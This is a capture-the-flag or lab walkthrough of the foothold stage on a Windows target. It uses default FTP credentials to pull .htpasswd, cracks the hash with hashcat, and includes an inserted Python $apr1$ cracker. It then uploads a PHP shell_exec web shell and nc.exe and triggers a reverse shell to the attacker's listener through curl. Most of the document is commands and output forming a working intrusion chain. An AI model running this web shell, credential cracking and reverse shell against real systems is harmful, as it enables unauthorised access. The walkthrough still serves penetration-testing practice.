Foothold
Last updated
Offsec:offsec is accepted by the FTP service on port 3145; the listing exposes the host's drive roots rather than a chrooted directory:
❯ ftp 192.168.207.46 3145
Connected to 192.168.207.46.
220 .
Name (192.168.207.46:adot): Offsec
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||2116|)
150 Opening connection for /bin/ls.
total 0
drw-rw-r-- 1 root root 512 Oct 21 12:05 E:DRIVE_CDROM:<CD-Rom>
drw-rw-r-- 1 root root 512 Oct 21 12:05 D:DRIVE_CDROM:<CD-Rom>
drw-rw-r-- 1 root root 512 Oct 21 12:05 C:DRIVE_FIXED:
drw-rw-r-- 1 root root 512 Oct 21 12:05 $:NETWORK_NEIGHBORHOOD:
226 Closing data connection.
admin:admin works on the default-port FTP (zFTPServer). That account lands in the web root, so the Apache auth files can be pulled:
ftp> get index.php
local: index.php remote: index.php
229 Entering Extended Passive Mode (|||2216|)
150 File status okay; about to open data connection.
100% |*************************************************| 76 824.65 KiB/s 00:00 ETA
226 Closing data connection.
76 bytes received in 00:00 (0.96 KiB/s)
ftp> get .htpasswd
local: .htpasswd remote: .htpasswd
229 Entering Extended Passive Mode (|||2217|)
150 File status okay; about to open data connection.
100% |*************************************************| 45 646.25 KiB/s 00:00 ETA
226 Closing data connection.
45 bytes received in 00:00 (0.49 KiB/s)
ftp> get .ht
.htaccess .htpasswd
ftp> get .htaccess
local: .htaccess remote: .htaccess
229 Entering Extended Passive Mode (|||2218|)
150 File status okay; about to open data connection.
100% |*************************************************| 161 2.29 MiB/s 00:00 ETA
226 Closing data connection.
161 bytes received in 00:00 (1.86 KiB/s)
The .htpasswd entry is an Apache $apr1$ MD5-crypt hash: hashcat mode 1600, with --user because the line is user:hash.
❯ hashcat -m 1600 offsec.hash ~/rockyou.txt -O --user --show
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0:elite
offsec:elite
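As an added example (not from the original writeup), the check hashcat runs at scale, done by hand: an implementation of Apache's $apr1$ MD5-crypt scheme, a small dictionary loop over the .htpasswd line pulled above, and the Authorization header the cracked pair produces for the later curl request. The wordlist is a constructed stand-in for rockyou; the hash and username are the ones on this page.

```python
# Added example (not from the original writeup): verify an Apache $apr1$ .htpasswd
# entry offline (what hashcat -m 1600 does), then build the Basic auth header
# the cracked credentials produce.
import base64
import hashlib

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$apr1$"


def _to64(value: int, count: int) -> bytes:
    """md5crypt's custom base64: least-significant 6 bits emitted first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def apr1_crypt(password: bytes, salt: bytes) -> str:
    """Apache APR1 MD5-crypt: the $apr1$ scheme 'htpasswd -m' writes (hashcat mode 1600)."""
    salt = salt[:8]
    ctx = hashlib.md5(password + MAGIC + salt)
    alt = hashlib.md5(password + salt + password).digest()
    # Mix in the alternate digest, one chunk per 16 bytes of password length.
    pl = len(password)
    while pl > 0:
        ctx.update(alt[: min(16, pl)])
        pl -= 16
    # Walk the bits of the password length: a NUL for set bits, first password byte otherwise.
    i = len(password)
    while i:
        ctx.update(b"\0" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    # 1000 stretching rounds with md5crypt's alternating input pattern.
    for i in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(password if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(password)
        ctx1.update(final if i & 1 else password)
        final = ctx1.digest()
    encoded = (
        _to64((final[0] << 16) | (final[6] << 8) | final[12], 4)
        + _to64((final[1] << 16) | (final[7] << 8) | final[13], 4)
        + _to64((final[2] << 16) | (final[8] << 8) | final[14], 4)
        + _to64((final[3] << 16) | (final[9] << 8) | final[15], 4)
        + _to64((final[4] << 16) | (final[10] << 8) | final[5], 4)
        + _to64(final[11], 2)
    )
    return (MAGIC + salt + b"$" + encoded).decode()


def verify_apr1(stored: str, candidate: str) -> bool:
    """True if candidate reproduces the stored $apr1$salt$hash string."""
    if not stored.startswith("$apr1$"):
        raise ValueError("only $apr1$ hashes are handled here")
    salt = stored.split("$")[2].encode()
    return apr1_crypt(candidate.encode(), salt) == stored


def crack_htpasswd(htpasswd: str, wordlist: list[str]) -> dict[str, str]:
    """Try every wordlist entry against each user:hash line; return the hits."""
    found = {}
    for line in htpasswd.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, stored = line.split(":", 1)
        for word in wordlist:
            if verify_apr1(stored, word):
                found[user] = word
                break
    return found


def basic_auth_header(user: str, password: str) -> str:
    """The header 'curl -u user:password' sends: base64(user:password) after 'Basic '."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Authorization: Basic {token}"


# The .htpasswd line pulled over FTP above; WORDLIST is a constructed stand-in for rockyou.
HTPASSWD = "offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0\n"
WORDLIST = ["123456", "password", "offsec", "elite", "letmein"]

if __name__ == "__main__":
    hits = crack_htpasswd(HTPASSWD, WORDLIST)
    print(hits)
    for user, pw in hits.items():
        print(basic_auth_header(user, pw))
```

The 1000-round loop is why mode 1600 is far slower than raw MD5 per candidate; the scheme is still unsalted-per-user-weak enough that a rockyou pass finds a five-character password instantly, which is the whole point of protecting a web root with something better than .htpasswd reachable over anonymous-grade FTP.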
❯ ftp 192.168.207.46
Connected to 192.168.207.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
Name (192.168.207.46:adot): admin
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||2220|)
150 File status okay; about to open data connection.
100% |*************************************************| 5 40.68 KiB/s 00:00 ETA
226 Closing data connection.
5 bytes sent in 00:00 (0.06 KiB/s)
❯ echo '<?php echo shell_exec($_GET["cmd"]); ?>' > cmd.php
ftp> put cmd.php
local: shell.php remote: cmd.php
229 Entering Extended Passive Mode (|||2221|)
150 File status okay; about to open data connection.
100% |*************************************************| 9409 66.96 MiB/s 00:00 ETA
226 Closing data connection.
9409 bytes sent in 00:00 (103.04 KiB/s)
ftp> put nc.exe
local: nc.exe remote: nc.exe
229 Entering Extended Passive Mode (|||2226|)
150 File status okay; about to open data connection.
100% |*************************************************| 59392 519.23 KiB/s 00:00 ETA
226 Closing data connection.
59392 bytes sent in 00:00 (354.39 KiB/s)
The web root sits behind the .htaccess Basic auth, so the request carries the cracked offsec:elite pair (base64 b2Zmc2VjOmVsaXRl); cmd= launches the uploaded nc.exe back to the listener, which should already be running:
❯ curl -H 'Authorization: Basic b2Zmc2VjOmVsaXRl' http://192.168.207.46:242/cmd1.php\?cmd\=nc.exe+192.168.45.239+1337+-e+cmd.exe
❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.207.46] 49163
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\wamp\www>whoami && type C:\Users\apache\Desktop\local.txt && ipconfig
whoami && type C:\Users\apache\Desktop\local.txt && ipconfig
livda\apache
b0f04e4444466725def304f2682457e6
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::9c3c:65f6:f306:59ff%12
IPv4 Address. . . . . . . . . . . : 192.168.207.46
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.207.254
Tunnel adapter Local Area Connection*:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :